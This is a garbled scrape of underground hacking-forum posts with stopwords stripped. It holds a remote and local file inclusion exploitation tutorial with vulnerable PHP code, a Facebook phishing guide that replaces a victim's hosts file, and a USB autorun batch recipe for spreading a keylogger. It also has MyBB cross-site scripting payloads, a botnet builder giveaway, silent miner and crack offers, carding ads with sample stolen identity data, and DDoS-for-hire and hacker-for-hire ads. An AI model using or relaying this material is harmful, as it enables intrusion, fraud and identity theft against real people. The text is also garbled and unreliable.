special promotion register and send your username evilnet null. 
you will get site credits for free. 
lets see really works not. 
this just what was looking for. 
thanks i'll try right now. 
wrote yea you heard correct its leaked not believe take look the link enjoy mike lets see what are talking about wrote yea you heard correct its leaked not believe take look the link enjoy mike lets see what leaked. 
thanks for posting this program hope works for some reason couldn't see the link after replying here again. 
add this email your list. 
table width hello friends mium vpnhello everybody here i'm going post mium vpn. 
you can connect austria chile france iceland isle man italy luxemburg poland romania spain sweden switzerland ukranie united kingdom united states you want download here hidden content you must reply see this content just install the vpnium. 
exe and then replace the file. 
exe with the file the crack folder note you cant connect this warn you about problem just try connect another time. 
securing rfi rfi means remote file inclusion. 
rfi type web application security hole. 
the net there are many sites which are vulnerable rfi. 
this tutorial going show you rfi with php. 
php web script engine. 
its the most widely used one that's why using this tutorial. 
learn more about php hidden content you must reply see links understand what file inclusion going show little example. 
this example site php code php code hello world this very basic page. 
but your page expands you might want put the individual pages their own files and include them the main file depending user input. 
this way when you got pages with perhaps lines php code you don't have use hours looking for the bit code you want edit view. 
user input mean things like url get argument. 
get argument could look like this html code html. 
php page index html the above example the php script would see the page index and then show the content index. 
the index can anything can file sql value hard coded variable. 
file then the php script most likely using the include function and that file inclusion. 
understanding rfi the above text said that file inclusion including files another file. 
well that all right but what does that actually mean well lets say got files. 
php the file people going view when they visit page. 
hidden content you must reply see links usual. 
php display the contents content. 
php without the user actually visiting content. 
all you would need put this php script the index. 
php code php php code. 
php now are showing the contents content. 
php when the user visits index. 
php was include more php code would also get executed. 
just did file inclusion however this example just dummy page and would most likely not found real life. 
lets create new scenario. 
got the following files pages index. 
php again the file the users are going visit. 
the default index are going display links. 
hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links when the user clicks the first link its going show the content. 
php when the user clicks the second link its going show the contents. 
php and when the user clicks the last link its going show the contents. 
php script site would this case look something like this note that now coding like idiot create security holes code php php code isset get 'page' include get 'page'. 
php page page echo. 
php page page the content and not important this example wont say anything about that. 
now when user clicks the page link she taken hidden content you must reply see links the php script index. 
php will now see that the user requesting the page called and will include the number the url. 
php the same goes for and. 
now what this remote part rfi all about well this belongs more the exploting rfi part this tutorial but have say something short about now. 
the above code vulnerable rfi. 
you can test this visiting hidden content you must reply see links that would give error assuming the server administrator have not turned off show errors the php configuration. 
the error would look something like this color warning include page. 
include failed open stream such file directory path line warning include function. 
include failed opening 'page. 
php' for inclusion include path. 
php line color this would tell that the include function used this script not secured and can exploited. 
the way you exploit getting include your code that you can control the server. 
this where the remote part rfi comes. 
you can create php script and save. 
txt upload server and then visit something like this hidden content you must reply see links note that the get rid the. 
php the end did not name the file. 
php and also you where try include. 
php file from remote server will only give the executed output the php file. 
now have successfully put out code the php engine the victim server and are free whatever you can with php. 
finding rfi like said above. 
check for the most basic all you need manipulate the get arguments and look for error messages looking like the one above. 
for more advance ones you might need try things out this called blind rfi. 
you gain more knowledge about php and rfi you will understand how perform blind rfi's. 
here few examples get arguments manipulating hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links use your imagination. 
and for those who did not understand. 
the arguments does not need page site. 
there are more advance versions rfi like post argument rfi and even cookie rfi and http header rfi and. 
but these should easy understand once you gain more knowledge about the http protocol and tcp with http servers and php etc. 
exploiting rfi lets say that you have successfully found vulnerable page. 
the url hidden content you must reply see links the php script made such way that only need edit page index page. 
txt and now got our php code over the victims server and executes. 
what you should now try make something called shell. 
shell essentially just php script that can perform explorer like actions. 
like read write edit create files and navigate folders etc etc. 
some shells even got inbuilt exploits gain root access the server but that's another story. 
now there truckload premade shells out there but really recommend you creating your own good learning and most shells actually detected antiviruses believe not. 
the server you are trying access got antivirus will now work and might perhaps spoil your attack. 
securing rfi secure user inputs and not just those you think used sql queries include functions etc. 
all user inputs should secured. 
you this strip disallow words phrases symbols the user inputs. 
and the most common solution when comes rfi just make the page less dynamic and hardcode the pages. 
you still want have dynamical editable page you must make sure you secure the user inputs. 
check for the word check for the word hidden content you must reply see links check for. 
check for etc etc. 
disable show php errors the php configuration. 
these are all easy things you can prevent rfi and lfi but that again another story. 
here example dynamic page and hardcoded page. 
the dynamic one not secure the hardcoded one. 
dynamic php code isset get 'page' include get 'page'. 
php page page hardcoded php code isset get 'page' get 'page' page include. 
php get 'page' page include. 
php page page enjoy with ihf. 
lfi stands for local file inclusion this vulnerability enables gain access over entire server uploading something called shell. 
this tutorial will just cover few basic necessities about lfi requirements perform lfi attack. 
tamper data link will posted when publish forum. 
php shell madspot guri some famous ones. 
webhosting account much important here's list dorks find. 
php content try googling and find sites when find site for example hidden content you must reply see links replace with etc passwd. 
basically your url looks like htp abcd. 
php etc passwd you get function. 
included error insert some. 
php your url looks like url index. 
lay wrote hidden content you must reply see linksthis tool really work but need wordlist for cracking. 
coder reiluke scanner results url download url hello mate thx lay wrote hidden content you must reply see linksthis tool really work but need wordlist for cracking. 
coder reiluke scanner results url download url thx for the upload. 
lay wrote this tool really work but need wordlist for cracking. 
coder reiluke scanner results url download url. 
really let check thnx. 
cross side script nice good dance. 
will try man hope works. 
very nice bro now its not working. 
safe use should use backup laptop. 
java php javascript web and desktop development android development pro making web bots you can also contact any assignment professional documentations essay jobs and power point presentations. 
deal only bitcoin not contact for any job that involves crypting and reverse engineering. 
bro have alrdy mentioned that tor and other proxy sofwares are blocked. 
none them are working. 
you are the man. 
color facebyte facebook account scraper. 
friend request bomber too requests hour color download here. 
link isn't working anymore. 
txt format posted administrator thnks. 
thank you for the post. 
lets see really cool. 
thanks bro will try this. 
thankx dude awesome tut aikido. 
easy money for doing not lot. 
thank wanna down load. 
cool bro i'll check out. 
admin please change the title facebook phishing hack your enemy's account size facebook phishing tutorial hack your enemy's account. 
com handle fopen usernames. 
now have upload web hosting site prefer use. 
com because will easy use. 
elite wrote bro your tutorial has been really great but the actual issue when download the darkcomet gets deleted windows automatically understand each and every step that specify thanks your depth explaination but its use gets deleted automatically windows removed mcafee turned the windows firewall off and did every damn thing prevent but all efforts vain what will the alternative this waiting for reply eliteseekers yahoo. 
ajay disable your windows firewall and remove your antivirus shout. 
codefirethanks man wrote password list containing passwords and most common used password list thanks for downloads post longer allowed here the download. 
prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach. 
let's it's seem's intresting. 
unknown error what could the problem. 
nic one thanks guru. 
thanks for sharing admin cxvc. 
thanx for the share hope works. 
hello friends today gona share you personal version athena botnet. 
have success rate with this botnet. 
had bots first days. 
because brotherhood want share with you guys. 
have included the builder and panel. 
you want know how setup msg here. 
will help you out. 
what are you waiting for get from here. 
com bobacd please not share this version any other forums. 
internet download manager idm. 
build crack note this crack has built update function. 
once idm new version comes you can update and apply crack right away. 
build included internet download manager universal web crack internet download manager aka idm developers release new build their well known download accelerator internet download manager regularly. 
everybody who uses pirated versions get pissed off that they have find new version crack every time when idm update comes. 
made really awesome fix for that universal web crack. 
new era scene world. 
web crack new concept cracks that download and update crack content the target program gets updated. 
whenever idm releases new version. 
update your crack using built updater and apply crack. 
easy that you can simply trust mhktricks idm crack because has history more than year with regular updates and also has more than worldwide downloads. 
install idm any version. 
run idm universal web crack. 
click crack button wait till message pops. 
that all what when new version build idm comes. 
will ask update crack update. 
crack usual how use the built fake serial fixer this crack how fix fake serial error. 
click small yellow warning button bottom right crack. 
use the fixer trying the three methods. 
click close fixer what new this universal web crack better faster cracking inbuilt crack update function inbuilt fake serial fix system better update method lesser size online key what new. 
build released march added support for firefox hidden content you must reply see links note always perform virus scan and download your own risk hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
codefire wrote don't think you can log. 
its only for connecting internet what you want. 
you need know hacking. 
read the tuts the hacking section thanks very much. 
but what meant could not use the connection not the computer. 
hope this works thank. 
wrote table width hello friends leys this trick still working dont beleieve look the below trick posted. 
thanks for your work. 
thanks worth giving try. 
thanks the best tuto the besr. 
thank you much this should make cracking easier. 
this simple guide read somebody else facebook messages without any effort cheers mike curious. 
this simple guide read somebody else facebook messages without any effort cheers let's see how works out mike. 
can you let try pkease. 
just follow the below link get free onedrive cloud storage please say thanks its only click hide reply. 
com onedrive microsoft giveaway coupon sale hide reply. 
hidden content very interesting sworn replied already wonder whats going. 
greed wrote hidden content you must reply see links this tested and working silent bitcoin miner. 
features anti sandboxie vmware anubis virtualpc startup melt proxy working windows windows vista windows windows download below checking this out thx tho. 
great post man thanks. 
bourdj wrote hidden content you must reply see linksyou have look the link url want answers pls thanks. 
please view the link. 
very good program thanks. 
name sami jeen blackhat hacker unlike other hackers here that request for half payment upfront dont that provide you with proof before you make payment payment method bitcoin helps stay anonymous now able hack almost anything long connected the internet can hack any smart phone spy even monitor chat messages like watsapp track maybe you want know contact sami. 
com icq your spouse cheating you you want know the wereabout your kids can hack social media sites like twitter instagram facebook myspace can hack any email address can hack into websites and edit records for you take down website can hack university web servers change student grades can make bank transfers send money your credit cards you need hacker you should contact contact sami. 
com icq hacker computer security. 
link not working kindly upload again please. 
patched apk now this share not take the credits modding this. 
options all photographic parameters are adjustable and all times hand publicity compensation iso mild metering mode center attention mode white stability and software mode. 
dslr like viewfinder show see publicity time aperture and forestalls show with and bracketing settings. 
full fledged publicity bracketing from frames limitless stops spacing plus customized transferring. 
constructed intervalometer make beautiful timelapses even bracketed hdr timelapses and time managed image collection. 
application and pace precedence modes. 
lengthy publicity make stronger take gorgeous night time pictures and lightweight trails with lengthy publicity instances much seconds. 
jpeg addition raw png picture codecs for lossless photograph shooting good for put processing. 
exif and xmp sidecar metadata strengthen. 
self timer for delayed taking pictures. 
autofocus macro contact center attention and infinity center attention modes plus focal point lock swap. 
historical past photograph growing and processing lets clean uninterrupted digital camera operation. 
how use video tutorial hidden content you must reply see links download the apk from bellow install that's all need seriously hit that button that's motivating factor hidden content you must reply see links don't think necessary for virus scan but for who skeptical here hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
thanx dear nice its works. 
express zip all versions patch here another release now with express zip express zip crack free download for all versions latest version full setup express zip crack free download for all versions latest version full setup from softwarezee. 
you are looking for ultra powerful compressing tool compress type files such document files multimedia files etc. 
then you have surely come right place right time. 
express zip excellent compressing tool that you can install your system without any security threats compress any file that can any format your choice. 
this software works accurately without any trouble. 
know days number system owners are used store large bulk data their systems hard drive. 
with advancement data steeling and virus attacks data stored hard drive has become necessarily compulsory save data stored computer from different threats. 
among all one the easy way protect your data stored system that you can compress with powerful compression tool you can also protect that compressed data with password protection. 
compressed data alone and may good password protected keeps different malware spyware and viruses stay away from your data. 
that why express zip can very handy for you use either for file compression for data protection through compression. 
this software has very user friendly but most important powerful interface for operating. 
you can download this software easily know from softwarezee. 
addition you can also download crack for express zip. 
through the crack that you can download from the download crack link given below you can easily register express zip. 
registered version you can use all features that are offered express zip software its registered version. 
links download both full version latest setup express zip and its crack are given below. 
express zip crack excellent thing get express zip registered. 
however express zip crack that given below free any viruses malware spyware. 
how register express zip first all download setup from the download link given below. 
secondly install the downloaded setup your system. 
thirdly download crack from the download crack link given below. 
fourthly open the crack file that you has downloaded. 
fifthly copy the patch folder installed directory the software. 
after that you have start. 
then next click the crack button. 
software registered joy seriously hit that button that's motivating factor hide hidden content you must reply see links hidden content you must reply see links don't think necessary for virus scan but for who skeptical here hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
this simple guide read somebody else facebook messages without any effort cheers mike thanks bro. 
thanks bro will give try. 
lets see really works. 
electra wrote friends you may have known about how create phishing web page. 
you don't know about phishing web page you need read this tutorials first install the wamp server. 
after installation completed this folder path wamp and paste your phishing web page here. 
start the wamp server. 
start windows all programs wamp server start wamp server you can see the half circle icon wamp server icon system tray mean near the time. 
click the icon and select the start all services. 
now type your address address bar the web browser and hit enter. 
you don't know your address visit. 
now you can see your phishing web page your browser. 
modifying the host file copy the host file from this path windows system drivers etc desktop. 
right click the host file and open with notepad. 
you can see the localhost entry there. 
below that type your domain name for. 
compress the host file compress hosts file such that when victim opens automatically gets copied default location windows system drivers etc and victim's hosts file get replaced our modified hosts file. 
right click the hosts file and select the add archieve option. 
now follow the steps which shown picture now send the zipped file victim. 
extract the zip file then the hosts file will replaced. 
now whenever try visit the genuine original website the phishing webpage only will shown. 
some disadvantages this hack your address dynamically changed then hard implement your victim advanced user may notice the certificates site which shown browser. 
don't worry not all big problem. 
just try ane enjoy. 
nice thread learned lot. 
texas united states blacklist checked. 
dawhah unknow qatar blacklist yes checked. 
net taiwan blacklist checked. 
this looks quite interesting thanks for the share. 
let try out good work dude. 
dave here again back teach you how chat safely and securely via the xmpp jabber messaging protocol. 
this tutorial will done windows but the same idea should transferred across linux distros and mac osx. 
the first thing you are going want download the xmpp client called pidgin. 
this can downloaded hidden content you must reply see links. 
once downloaded ahead with the install completion. 
hidden content you must reply see links once installed start pidgin. 
you will presented with two different windows. 
ignore them for now. 
have first grab the software that will allow chat securely. 
called otr which stands for off the record messaging and can downloaded hidden content you must reply see links. 
make sure that the pidgin application closed out from your screen and taskbar before installing otr. 
hidden content you must reply see links great. 
otr and pidgin are now installed more downloads from here out the tutorial just few simple configurations pidgin. 
the first thing need make the otr plugin active pidgin. 
this opening pidgin going the tools drop down selecting plugins and clicking the checkbox next off the record messaging. 
hidden content you must reply see links once are done with that can enter our xmpp account details and start chatting make new account you not have one. 
you need list free xmpp service providers you can get one hidden content you must reply see links link. 
for the example will make new account with the hidden content you must reply see links service. 
you can register through the client like will show you how you can register online from hidden content you must reply see links link. 
the first step register from the client will enter the username password and domain. 
the username and password will your choosing but the domain will hidden content you must reply see links without the quotation marks. 
the resource box should left blank. 
next check the create this new account the server box the bottom the screen. 
should look something like this. 
hidden content you must reply see links the next steps take one more step even more secure will set tor socks proxy that not only are the messages encrypted with otr but the traffic encrypted with tor. 
that click the proxy tab and set your host and port accordingly. 
make sure that tor running well you will get connection errors once this done click the add button back the buddy list click the accounts drop down click manage accounts and finally click the checkbox next your account. 
this will send the request the server and ask you confirm your new account. 
hidden content you must reply see links you get error that pops don worried. 
sometimes there error with the server and you will have register online. 
this has happened several times and normal. 
just register the website the xmpp host you are using. 
once you have done all this you need add your buddy and get chat with him her. 
will using fake account for this example but the same actions transfer over when you chat with real account. 
all you need click the otr button the chat room and click start private conversation. 
wait few seconds and just like that you are chatting securely via xmpp. 
hidden content you must reply see links hope this tutorial has been helpful and always you have any questions problems feel free post comment and will best help. 
great job bro have done too nothing found and tested other sites with detection chances lovely impressed completely great job bro sha cfbc dbb bcec file name server encrypted. 
exe detection ratio analysis date utc minutes ago more details analysis comments votes additional information antivirus result update agnitum ahnlab antivir antiy avl avast avg bitdefender bytehero cat quickheal clamav commtouch comodo drweb emsisoft esafe eset nod prot secure fortinet gdata ikarus jiangmin antivirus kaspersky kingsoft malwarebytes mcafee mcafee edition microsoft microworld escan nano antivirus norman nprotect panda pctools rising sophos symantec thehacker totaldefense trendmicro trendmicro housecall vba vipre virobot. 
interesting thanks i'll check out. 
good things decisive away. 
okay lets try this and see. 
video deleted plz another vid. 
sent from huawei using tapatalk. 
hey this pretty good. 
thanks for the heads buddy. 
freebitcoin win free bitcoins every hour win free bitcoins multiply your bitcoins playing win jackpots bitcoin free weekly lottery with big prizes referral commissions for life just sign for free seriously hit that button that's motivating factor. 
give the link will try. 
filesmonster premium account november user diego dar pass diegoman tested working. 
cool cant wait see. 
read anyone's facebook message without hacking them still working its deadlink please update this article. 
endgam apologize this the wrong section for this. 
okay endgam apologize this the wrong section for this. 
will check the exploit. 
evilzone code there and tell top hacking fourms. 
hop order achieve success dictionary attack need large size password list. 
thanks sent from using tapatalk thanks for the list sent from using tapatalk. 
prince chaddha wrote facebook account reset hijack session day exploit only for url attach config attach prince chaddha wrote facebook account reset hijack session day exploit only for url attach config attach. 
thanks man will check out. 
combos email pass only the first service ckecking for public your combos you have really fat combos thats can take lots time information screen means that accs are already the base and there high chance that they were already checked private mean combos that are not the base accs green private red public blue worong domens that means that combos are worng for example russian mails chines want offer you service cracking your combos for steam check for steam need only valied combos thats mean that you can log email there example speed. 
jtena not taking you combos and delete them after cracking. 
after cracking will send you files hidden profiles where you can find accs format login domen pass mail pass asgasgasga login. 
com profiles steamlink result where you can find accs format login info login domen pass account login asdasasgasgasg profile link. 
com profiles steamid digit time played last enter there some bug all accs are showing like they are online hah profile level profile groups info profile friends info profile created january trade status vac status means that doesnot have vac ban trade ban game status offline mobile check mail cannot read dota tera. 
airmech airmech apb reloaded apbreloaded archeblade blacklight retribution champions online city steam arkadia crimecraft gangwars dogs war online beta dungeon party dungeons dragons online dwarfs everquest everquestii football superstars frontline tactics global agenda gotham city impostors free play gunz the second duel haunted memories infinity wars animated trading card game jagged alliance online steam edition jagged alliance online raven pack loadout march war marvel heroes marvelheroes neverwinter more room hell path exile pathofexile planetside ragnarok raiderz realm the mad god rift rusty hearts rustyhearts soldier front soldierfront solstice arena spiral knights star trek online stronghold kingdoms tactical intervention the lord the rings online the mighty quest for epic loot the plan tribes ascend warframe warframe war inc. 
battlezone war thunder warthunder steam for work want only contact via skype nerol dont really want crack public accs for steam that way will check combos the soft and only private will ckecked for steam vouch crack test only for person with good rep. 
wrote the main drivers for botnets are for recognition and financial gain. 
the larger the botnet the more kudos the herder can claim have among the underground community. 
the bot herder will also rent the services the botnet out third parties usually for sending out spam messages for performing denial service attack against remote target. 
due the large numbers compromised machines within the botnet huge volumes traffic either email denial service can generated. 
however recent times the volumes spam originating from single compromised host have dropped order thwart anti spam detection algorithms larger number compromised hosts send smaller amount messages order evade detection anti spam techniques. 
botnets have become significant part the internet albeit increasingly hidden. 
due most conventional irc networks taking measures and blocking access previously hosted botnets controllers must now find their own servers. 
often botnet will include variety connections and network types. 
sometimes controller will hide irc server installation educational corporate site where high speed connections can support large number other bots. 
exploitation this method using bot host other bots has proliferated only recently most script kiddies not have the knowledge take advantage. 
several botnets have been found and removed from the internet. 
the dutch police found. 
million node botnet and the norwegian isp telenor disbanded node botnet. 
july the fbi arrested year old slovenian held responsible for the malicious software that integrated estimated million computers into botnet. 
large coordinated international efforts shut down botnets have also been initiated. 
has been estimated that one quarter all personal computers connected the internet may part botnet. 
botnet lifecycle bot herder configures initial bot parameters such infection vectors payload stealth details register ddns register static bot herder launches seeds new bot bots spread causes increase ddos being sent the victim losing bots rival botnets types attacks denial service attacks where multiple systems autonomously access single internet system service way that appears legitimate but much more frequently than normal use and cause the system become busy. 
adware exists advertise some commercial entity actively and without the user's permission awareness for example replacing banner ads web pages with those another content provider. 
spyware software which sends information its creators about user's activities typically passwords credit card numbers and other information that can sold the black market. 
compromised machines that are located within corporate network can worth more the bot herder they can often gain access confidential information held within that company. 
there have been several targeted attacks large corporations with the aim stealing sensitive information one such example the aurora botnet. 
mail spam are mail messages disguised messages from people but are either advertising annoying malicious nature. 
click fraud the user's computer visiting websites without the user's awareness create false web traffic for the purpose personal commercial gain. 
access number replacements are where the botnet operator replaces the access numbers group dial bots that victim's phone number. 
given enough bots partake this attack the victim consistently bombarded with phone calls attempting connect the internet. 
having very little defend against this attack most are forced into changing their phone numbers land line cell phone etc. 
fast flux dns technique used botnets hide phishing and malware delivery sites behind ever changing network compromised hosts acting proxies. 
preventive measures machine receives denial service attack from botnet few choices exist. 
given the general geographic dispersal botnets becomes difficult identify pattern offending machines and the sheer volume addresses does not lend itself the filtering individual cases. 
passive fingerprinting can identify attacks originating from botnet network administrators can configure newer firewall equipment take action botnet attack using information obtained from passive fingerprinting. 
the most serious preventive measures utilize rate based intrusion prevention systems implemented with specialized hardware. 
some botnets use free dns hosting services such dyndns. 
org point subdomain towards irc server that will harbor the bots. 
while these free dns services not themselves host attacks they provide reference points often hard coded into the botnet executable. 
removing such services can cripple entire botnet. 
recently these companies have undertaken efforts purge their domains these subdomains. 
the botnet community refers such efforts nullrouting because the dns hosting services usually direct the offending subdomains inaccessible address. 
the botnet server structure mentioned above has inherent and problems. 
for example one was find one server with one botnet channel often all other servers well other bots themselves will revealed. 
botnet server structure lacks redundancy the disconnection one server will cause the entire botnet collapse least until the controller decides new hosting space. 
however more recent irc server software includes features mask other connected servers and bots that discovery one channel will not lead disruption the botnet. 
several security companies such afferent security labs symantec trend micro fireeye simplicita and damballa have announced offerings stop botnets. 
while some like norton antibot discontinued are aimed consumers most are aimed protect enterprises and isps. 
the host based techniques use heuristics try identify bot behavior that has bypassed conventional anti virus software. 
network based approaches tend use the techniques described above shutting down servers nullrouting dns entries completely shutting down irc servers. 
newer botnets are almost entirely with command and control embedded into the botnet itself. 
being dynamically updateable and variable they can evade having any single point failure. 
commanders can identified solely through secure keys and all data except the binary itself can encrypted. 
for example spyware program may encrypt all suspected passwords with public key hard coded distributed into the bot software. 
only with the private key which only the commander has can the data that the bot has captured read. 
newer botnets have even been capable detecting and reacting attempts figure out how they work. 
large botnet that can detect that being studied can even ddos those studying off the internet. 
there effort researchers sandia national laboratories analyze the behavior these botnets simultaneously running one million linux kernels virtual machines node dell high performance computer cluster. 
this will help you. 
bitgenerator new miner that can process bitcoin blocks about faster than any other miner available. 
was developed smartly use computer hardware the most efficient way possible which means that any conventional can used mine. 
with ram and intel core duo processor you can achieve. 
that means you can make. 
bitcoins day the tool incredibly easy use. 
it's still its beta version but you can download and try for free. 
thanks bro nice sharing. 
let see the text pls. 
eset smart security keys enjoy urhn usa kbd pcb cmum sbv bnjn hpt amk xtx bbat bbps udrb agar jgpn gxfk bvkv ttu wtpf btsm uucf jjx rhx ajc ptt uecd download here important choose the depending your system don't forget smack that. 
wrote yea you heard correct its leaked not believe take look the link hidden content cannot quoted. 
must give credit you for the easy instruction 'reply'. 
download hidden content cannot quoted. 
cheers mike table that awsome. 
mourad wrote tnx man for this informati. 
patani kesa hai chalo dkehte hai. 
lets try this thank for sharing. 
your college school they restrict see some sites you can access without any restrictions using the proxy server. 
color what proxy color color proxy server some kind buffer between your computer and the designated internet destination. 
when you use proxy server your computer will send request the proxy server then the proxy server will send the destination for example website the destination will answer the request the proxy has sent and finally the proxy will return the data you computer. 
reasons for using proxy servers proxy server able increase decrease the speed your connection the internet depending the location the proxy proxy server but only anonymous can hide your address the resource you visit will retrieve the the proxy and not your proxy servers can help case some owner internet resource impose restrictions for users from certain countries for example hulu. 
com only reserved for those from united states you are not from united states you can watch videos hulu. 
com color color how use. 
open the proxy server site. 
when you open the browser will ask you get the certificate. 
click get certificate and click. 
now site will opened. 
the website will ask you enter the url site. 
enter url site you want visit. 
color list proxy sites color pricacywanted. 
com fly proxy fire proxy color. 
admin panel fpd multiple xss date. 
trunk pae smp debian. 
kali gnu linux vendor mybb. 
latest atm contant smash devilteam. 
cross site scripting installation wizard database configuration fill database name with your for example alert fact other input's are also vulnerable. 
while there's error database configuration the alert will popup. 
line could not select the database 'alert. 
are you sure exists and the specified username and password have access table creation table prefix will contain script will executed next step table creation. 
full path disclosure administration panel localhost mybb upload admin index. 
php module warning strpos expects parameter string array given line file localhost mybb upload admin index. 
deb linux warning explode expects parameter string array given line file localhost mybb upload admin index. 
deb linux error's appears line's. 
multiple persistent cross site scripting administration panel smiles edit smilies for example localhost mybb upload admin index. 
php module config smilies action edit sid now fill image path with images smilies angel. 
gif'' alert alert will appear whenever someone enter smilies configuration localhost mybb upload admin index. 
php module config smilies mycode edit code for example localhost mybb upload admin index. 
php module config mycode action edit cid fill title and short description with alert alert will appear whenever someone visit localhost mybb upload admin index. 
php module config mycode post icons post icons for example mybb upload admin index. 
php module config post icons action edit iid fill image path with images icons biggrin. 
gif'' alert now the alert will appear whenever there will possibility use them like posting new thread. 
examples localhost mybb upload modcp. 
php action edit announcement aid localhost mybb upload calendar. 
php action addevent calendar private localhost mybb upload newthread. 
php fid find users first create custom profile field with code whatever like localhost mybb upload admin index. 
php module config profile fields then goto localhost mybb upload admin index. 
php module user users vid xss appears lines warning system warning system then 'add new warning type' localhost mybb upload admin index. 
php module config warning action add type fill warning's title with alert annoucments administrator moderatore create new annoucment localhost mybb upload admin index. 
php module forum announcements action edit aid fill message with your code for example now visit your annoucment localhost mybb upload announcements. 
php aid you can see brackets are not filtered forum managment forum managment localhost mybb upload admin index. 
php module forum management action edit fid fill title description and rules with its title remember change display method with your code for example. 
firstly xss will appear localhost mybb upload admin index. 
php module forum management. 
php module forum management fid forum'' now display the forum localhost mybb upload forumdisplay. 
php fid there's xss lines forum'' forum''. 
how use trial software full time editing registry now need any software for crack for increase time period just edit registry. 
this works upon party software just applying simple steps you can easy crack any software. 
what going will remove the trace that the software was previously installed your computer and the next time again when you install the software will not find the trace back that this software had been previously installed this computer. 
steps are here color. 
first uninstall the software. 
start and just type regedit. 
now step local machine software your software name. 
this for current user there exists key that software. 
for delete temporary files. 
users username appdata check all directories that local locallow roaming for your software entry. 
now just reinstall application and enjoy the next trial. 
you can use this every time. 
size color cool cool cool cool size. 
will check the content still working now. 
see this fake ass shit. 
ill give try thank you very much. 
download ghg fhh ghghghg ggf. 
please school closed the portal and ended registration but reopened for others but not every one. 
kinda starnded its final year and have register urgently please. 
hackers help out the website. 
diskcryptor fully open source hdd encryption application that much faster than truecrypt and decreases ssd performance very little the biggest advantage over truecrypt other than being fully open source that supports external bootloaders means you can write your bootloader usb your encrypted hdd will look like bunch random data without. 
hidden content you must reply see links table hidden content you must reply see links main window hidden content you must reply see links about hidden content you must reply see links bootloader configuration hidden content you must reply see links general settings hidden content you must reply see links setting password for volume encryption hidden content you must reply see links image file encryption table. 
thx for sharing and let try this thx for sharing and let try this app. 
let's see how works does the. 
we'll check this out. 
gonna try out sec. 
thanks friend ill check out now. 
merci pour partage bro. 
will see that thanks you very much. 
dumps credit card fullz bank logins transfer spamming tools available the update ready. 
hurry mates the trade starts from now you missed our production are having great big update hurry and get your pockets full rustling cash good luck brothers freshly skimmed dumps ccv fullz plastic cards smtp rdp validity western union transfers booking flights paypal accounts shop admin warning new customers hope you are better customer while both can work long time. 
hit only decided and ready buy and have chosen payment type accepted services. 
thank you sir contact info yahoomessenger carders. 
creed mail sarrahlovely gmail. 
com jabber creedcarders jabbim. 
com icq fresh first hand fullz visa master amex dis with dob amex dis amex dis full info full info australia switzerland france germany mexico new zealand italy asian cvv all country and many country other master and visa bin fullz rezult user trexies password stroke full name jane. 
city charlotte state zip code phone mail address flagg bellsouth. 
net email password stroke mother maiden name klutz driver's license account number routine number date birth feb social security atm pin code credit card number expiration date cvv number normal formate firstname lastlame address city state email zipcode country phone cardnumber expirydate cvv are hackers here help not make money only charge because the cost time and effort involved the services and products offer. 
using our service you will find out individual approach the client the big spectrum the countries and the excellent quality. 
the small test agreed possible. 
have flexible prices case purchase great volume installs the individual conditions are possible. 
mailers inbox mailer webmail mailers cpannel send requirement email address carders. 
com send this info chat. 
verifed paypal accounts acc paypal verified with balance acc paypal verified with balance acc paypal verified with balance email address paypal password full information there complete account information before selling username username aol. 
com password name curt jentsch address marks apt brooklyn united states paypal balance. 
bank rbc first trust bank banque nationale hdfc bank prices email address password and complete information fresh rich dumps. 
classic standart discover gold plat bus corp sign amex corporate corporate centurion. 
code and classic standart discover gold plat bus corp sign western union transfers western union money transfer most countries transfer upfront whatever amount you want transfer for you you want you will have pay upfront. 
require receiver first name and last name receiver address receiver email address payment info mtcn will ready for pick maximum minus after payment please dont ask for any test transfer prices for western union online transfer asia canada france germany italy and nigeria transfer charges payment btc transfer transfer transfer transfer transfer transfer for first time buyers for build trust and loyal together here before move bigger amount mtcn will ready for pick maximum minus after payment note only time transfer name week you need daily transfers then you must have use more names. 
the list transportation high end electronics laptop apple laptop dell laptop toshiba laptop lenovo laptop samsung laptop acer laptop vaio iphone iphone ipad black berry iphone iphone perfums etc transit time from days every days will send shipping tracking payment method btc rules long talk please read rules respect them. 
please not contact contact info yahoomessenger carders. 
creed icq mail sarrahlovely gmail. 
com please contact soon your satisfaction happiness respectfully thank you together make happen. 
tnx and good luck. 
thanks brother really needed soon will test. 
nice post very very thank you. 
thanks alot for this tools for share. 
was just wondering used web based checker for netflix couldn't the site also take log the working ones have would better using program checker. 
can use this method buy online products. 
dont belive need check first. 
excited thank you man. 
codefirethanks bro wrote indent sqli binger works with bing and automatically finds sqli vuln sites same server. 
how spread keylogger using pendrive using autorun. 
open notepad and copy the followig code. 
bat the file want execute when our usb inserted. 
ico the name icon file want set our usb drive. 
copy the following code edit accordingly echo off start location the keylogger saved folder named fatalcuddle which present the root directory usb. 
then the code should like this echo off start fatalcuddle keylogger. 
exe the keylogger present the root directory then code should like this echo off start keylogger. 
bat and place the root directory the usb. 
give this usb your friends and when they will insert this their systems the will infected with your keylogger. 
nice leak still anyone found how autorun usb upon putting the slot. 
thanks bro for the share. 
can use this method buy online products master cards. 
rafiqctg wrote hidden content you must reply see linkshi friends enjoy dont change password url thxs rafiqctg wrote hidden content you must reply see linkshi friends enjoy dont change password url nice thx rafiqctg wrote hidden content you must reply see linkshi friends enjoy dont change password url. 
thanks awesome great post. 
attach config attach download. 
can try this adf. 
replying here see the content. 
codefire wrote password list containing passwords and most common used password list thanks for downloads post longer allowed here the download saxasxax. 
send the apk the victim via mms will she have any clue what's going. 
its good looks but actually whats the use. 
offer you high quality service for ddos attacks carry out orders that others could not work exclusively private software work with sites with any protection anonymously are experienced the best ratio price and quality can attack multiple sites once multiple types attacks ntp sdp sudp http head http get http post essyn home xsyn spoofed udp xml rpc post rudy arme chargen dns amplification enhanced spoofed syn spoofed syn tcp amplification slowloris udp lag minecraft make test for minutes for free price day from week from month from good customer discounts payment only bitcoin contacts icq jabber makeeasy xmpp. 
with otr tags for google order ddos attack ordered ddos ddos service server ddos ddos service attack the server the attack the site massive ddos attack kill server powerful ddos attack bring the site down ddos the siteneed ddos how harm site how remove the site stop site work turn off the competitor's site how fill the site ddos attack killing site need ddos site how eliminate competitor's site how remove competitor's site ddos attack the order hacking hacker attack. 
download here download here download here password swapnilhaxor enjoy. 
